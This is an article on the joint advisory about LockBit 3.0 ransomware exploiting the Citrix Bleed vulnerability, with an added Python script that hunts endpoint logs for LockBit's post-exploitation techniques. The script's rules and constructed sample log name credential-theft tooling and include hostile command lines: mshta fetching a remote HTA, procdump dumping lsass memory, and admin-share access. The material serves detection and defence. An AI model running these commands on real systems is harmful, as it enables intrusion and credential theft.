Boeing Supplements CISA Advisory for LockBit's Abuse of Citrix Bleed Vulnerability
A collaborative effort by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate's Australian Cyber Security Centre (ASD's ACSC) has resulted in a comprehensive Cybersecurity Advisory (CSA) addressing the critical threat posed by LockBit 3.0 ransomware exploiting CVE-2023-4966, known as Citrix Bleed. The advisory was aided by intelligence from victim organizations including Boeing, a recent victim of LockBit, which exploited the vulnerability to gain initial access to Boeing Distribution Inc.'s parts and distribution business.
Citrix Bleed, identified as the vector for the LockBit 3.0 attacks, enables threat actors to "bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances." Because the hijacked session is a legitimate, already-authenticated one, strong credentials and MFA offer no protection once the appliance is exploitable. The advisory outlines Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) obtained from multiple sources, including Boeing, to equip network administrators with the information needed to mitigate the risk. The vulnerability, disclosed by Citrix on October 10, 2023, affects multiple versions of NetScaler ADC and Gateway, making prompt patching crucial.
CVE-2023-4966 is reported to have been exploited since August 2023, roughly two months before Citrix's disclosure. LockBit 3.0 affiliates, upon gaining access, use a PowerShell script to execute a malicious Dynamic Link Library (DLL) file. This DLL, executed through rundll32, attempts to communicate with a suspicious domain, adobe-usupdatefiles[.]digital, which, as CISA explains, "ha[s] no association with legitimate Adobe software and no identified interaction with the software." Additional TTPs include the deployment of remote management tools, Batch and PowerShell scripts, and HTA files using native Windows utilities. The advisory also calls out suspicious use of the MSHTA utility with HTTP parameters, lists tools commonly found in LockBit campaigns, including Plink, Mimikatz, Procdump and PsExec, and flags suspicious access to Windows admin shares.
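Hunting for these post-exploitation TTPs in endpoint telemetry, as an added example that is not code from the advisory, CISA or Boeing: because the appliance itself may not record the exploit request, the host-level activity that follows (rundll32 loading a DLL from an untrusted path, mshta launched with an HTTP argument, DNS lookups of the published domain, the named tooling, and admin-share access from the command line) is where detection has to happen. The log lines below are constructed, Sysmon-style JSON records, the field names are an assumption, the trusted-DLL directories and tool list are assumptions to tune per environment, and the only IOC taken from the advisory is the domain.

```python
"""Hunt for LockBit 3.0 post-exploitation TTPs in endpoint logs.

Added example, not code from the CISA advisory or Boeing.  Log records are
constructed Sysmon-like JSON lines (field names are an assumption).
"""
import json
import re

# Domain published in the advisory (defanged there as adobe-usupdatefiles[.]digital)
IOC_DOMAIN = "adobe-usupdatefiles.digital"

# Tooling the advisory associates with LockBit campaigns (image basenames, lower-case)
LOCKBIT_TOOLS = {"plink.exe", "mimikatz.exe", "procdump.exe", "procdump64.exe",
                 "psexec.exe", "psexesvc.exe"}

# Directories from which rundll32 is expected to load DLLs (assumption: tune locally)
TRUSTED_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                    "c:\\program files\\", "c:\\program files (x86)\\")

RUNDLL32_DLL_RE = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+\.dll)', re.IGNORECASE)
HTTP_ARG_RE = re.compile(r"https?://", re.IGNORECASE)
ADMIN_SHARE_RE = re.compile(r"\\\\[^\\\s]+\\(?:c\$|admin\$|ipc\$)", re.IGNORECASE)


def check_event(ev):
    """Return a list of (rule, detail) matches for one parsed event."""
    hits = []
    if ev.get("event") == "process_create":
        image = ev.get("image", "").lower().rsplit("\\", 1)[-1]
        cmd = ev.get("command_line", "")
        if image in LOCKBIT_TOOLS:
            hits.append(("lockbit_tooling", image))
        if image == "rundll32.exe":
            m = RUNDLL32_DLL_RE.search(cmd)
            if m and not m.group(1).strip().lower().startswith(TRUSTED_DLL_DIRS):
                hits.append(("rundll32_untrusted_dll", m.group(1).strip()))
        if image == "mshta.exe" and HTTP_ARG_RE.search(cmd):
            hits.append(("mshta_http", cmd))
        m = ADMIN_SHARE_RE.search(cmd)
        if m:
            hits.append(("admin_share_access", m.group(0)))
    elif ev.get("event") == "dns_query":
        q = ev.get("query", "").lower().rstrip(".")
        if q == IOC_DOMAIN or q.endswith("." + IOC_DOMAIN):
            hits.append(("ioc_domain", q))
    return hits


def hunt(lines):
    """Run every rule over JSON-lines telemetry; returns a list of finding dicts."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        for rule, detail in check_event(ev):
            findings.append({"host": ev.get("host"), "rule": rule, "detail": detail})
    return findings


# Constructed sample telemetry: a benign rundll32 call, the TTPs from the advisory,
# a benign local HTA, and an unrelated browser launch that also carries a URL.
SAMPLE_LOG = r"""
{"event": "process_create", "host": "WS01", "image": "C:\\Windows\\System32\\rundll32.exe", "command_line": "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"}
{"event": "process_create", "host": "WS01", "image": "C:\\Windows\\System32\\rundll32.exe", "command_line": "rundll32.exe C:\\ProgramData\\update.dll,Start"}
{"event": "dns_query", "host": "WS01", "query": "adobe-usupdatefiles.digital"}
{"event": "process_create", "host": "WS01", "image": "C:\\Windows\\System32\\mshta.exe", "command_line": "mshta.exe http://203.0.113.10/update.hta"}
{"event": "process_create", "host": "WS02", "image": "C:\\Windows\\System32\\mshta.exe", "command_line": "mshta.exe C:\\Users\\alice\\AppData\\Local\\Temp\\setup.hta"}
{"event": "process_create", "host": "WS01", "image": "C:\\Windows\\System32\\cmd.exe", "command_line": "net use \\\\FS01\\C$ /user:corp\\admin"}
{"event": "process_create", "host": "WS01", "image": "C:\\Users\\Public\\procdump64.exe", "command_line": "procdump64.exe -accepteula -ma lsass.exe lsass.dmp"}
{"event": "process_create", "host": "WS02", "image": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "command_line": "chrome.exe https://example.com"}
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG.splitlines()):
        print(f"{f['host']}: {f['rule']} -> {f['detail']}")
```

The rules are deliberately scoped to the launching image (rundll32, mshta) rather than to any command line containing a URL or `.dll`, which keeps a browser launch or a normal Control Panel call from firing; the untrusted-path check is the piece most worth tuning, since some legitimate software does load DLLs from ProgramData.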
Security researcher Kevin Beaumont, reporting on Mastodon, has also identified multiple vulnerable Citrix appliances coinciding with breach reports from the Industrial and Commercial Bank of China (ICBC), DP World, and Allen & Overy. Beaumont's report also warns of visibility gaps in logging, as the "initial exploitation has no logs at all as Citrix Netscaler/Gateway fails to log the exploit request." Given how easy the vulnerability is to exploit and the absence of exploit logging on the appliance, both the joint advisory and Beaumont's report emphasize the urgent need for network administrators to apply the provided mitigations, including isolating affected appliances and applying the necessary software updates.